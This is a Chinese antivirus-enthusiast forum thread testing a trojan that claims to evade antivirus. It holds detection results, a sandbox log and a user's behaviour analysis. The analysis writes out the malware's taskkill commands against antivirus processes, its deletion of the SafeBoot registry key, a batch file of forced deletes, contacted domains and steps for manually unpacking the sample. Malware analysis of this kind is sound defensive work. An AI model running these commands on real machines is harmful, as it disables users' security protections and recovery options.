，某人吹牛此样本双击运行后无视杀软，谁来鉴定鉴定

crystalsong08

A2报毒

马马屠干掉

Ｍy↘じ★ve

质量太低，测试无意义，杀软肯定都会想办法解决自家主防不拦截的问题，所以我相信哪个杀软的主防开着，双击都没问题。

2012-08-29 23:30:30         C:\Users\Administrator\Desktop\秒杀.exe         修改文件         C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Cookies\  

2012-08-29 23:30:47         C:\Users\Administrator\Desktop\秒杀.exe         修改文件         C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Cookies\index.dat  

2012-08-29 23:30:55         C:\Users\Administrator\Desktop\秒杀.exe         修改文件          C:\Users\Administrator\AppData\Local\Microsoft\Windows\History\History.IE5\  

2012-08-29 23:30:58         C:\Users\Administrator\Desktop\秒杀.exe         修改文件         C:\Users\Administrator\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat  

2012-08-29 23:31:03         C:\Users\Administrator\Desktop\秒杀.exe         修改注册表项         HKUS\360SANDBOX\S\Registry\USER\S-1-5-21-2065295393-3029720207-2865930595-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable  

2012-08-29 23:31:11         C:\Users\Administrator\Desktop\秒杀.exe         修改注册表项         HKUS\360SANDBOX\S\Registry\USER\S-1-5-21-2065295393-3029720207-2865930595-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings  

2012-08-29 23:31:27         C:\Users\Administrator\Desktop\秒杀.exe         DNS/RPC 客户端访问           

2012-08-29 23:31:33         C:\Users\Administrator\Desktop\秒杀.exe         修改文件         \Device\Afd\Endpoint  

2012-08-29 23:32:18         C:\Users\Administrator\Desktop\秒杀.exe         访问COM接口         LocalSecurityAuthority.SystemTime  

2012-08-29 23:32:49         C:\Users\Administrator\Desktop\秒杀.exe         修改文件         \Device\Nsi  

2012-08-29 23:33:13         C:\Users\Administrator\Desktop\秒杀.exe         创建进程         C:\Windows\system32\taskkill.exe   

报告结束

然后就是联网行为，就算是在360的沙盘里运行，主防都看不过眼了，插手下去拦截，忽略就不能在360沙盘运行下去，真蛋疼。

wjcharles

NIS2012 入库

完整路径: c:\users\sshss\downloads\双击测试\秒杀.exe
威胁: Trojan.KillAV
____________________________
____________________________
在电脑上的创建时间 2012/8/29 ( 23:38:51 )
上次使用时间 2012/8/29 ( 23:38:51 )
启动项目 否
已启动 否
____________________________
____________________________
未知
诺顿社区中使用此文件的用户数量: 未知
____________________________
未知
此文件版本当前未知。
____________________________
高
此文件具有高风险。
____________________________
威胁详细信息
威胁类型: 病毒。 将自身插入或附加到其他程序、文件或电脑区域以感染这些媒介的程序。
____________________________

____________________________
文件操作
文件: c:\users\sshss\downloads\双击测试\秒杀.exe
已阻止
____________________________
文件指纹 - SHA:
513c6e85c05e8f0e8ddb85c5673e1c42deb685589ee4cc4469b2d14f35bd74d7
____________________________
文件指纹 - MD5:
3def02943258ca4f91a7647948241988
____________________________

qzmxy2006

ikwj

落漠

mcafee没动静  360杀了

crystalsong08

FS直接拦截

xiaogujian

ujty 发表于 2012-8-29 23:13
每次看到这个avg2013UI，都被深深的震撼。。。。

我还以为是诺顿的

iyinyt

BD killed.   Trojan.KillAV.RY

zhq445078388

添加启动项
c:\windows\system32\0.vbs
调用taskkill结束杀软进程
taskkill /f /im kavsvc.exe
taskkill /f /im KVXP.kxp
taskkill /f /im Rav.exe
taskkill /f /im Ravmon.exe
taskkill /f /im Mcshield.exe
taskkill /f /im VsTskMgr.exe

检查是否存在HKEY_LOCAL_MACHINE\SOFTWARE\360Safe
存在则taskkill /f /im 360tray.exe

对
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\
进行删除 破坏安全模式

然后释放bat文件
内容:
@echo off
regedit /s reg.reg
assoc .exe=exefile
del /f /s /q /a C:\WINDOWS\system32\reg.reg
del /f /s /q /a C:\WINDOWS\system32\reg.bat

访问
www.hongke-vip.com
http://shitouhk.zw78.com/

可能是耍流量或者获取远程指令



释放一堆fne fnr文件 应该是E语言写的

所谓无视杀软 就是调用taskkill结束杀软进程 然后写启动项常驻
然后干掉安全模式

这个一般都会被杀的



以NSPack 4.1加壳
真正入口点在 00403861


手脱方法

以od载入
f8一下 esp凸现 然后在esp指向位置下硬件断点

然后f9运行起来 停在一处jmp代码处
f8跟进去 到入口点了 dump出来就行了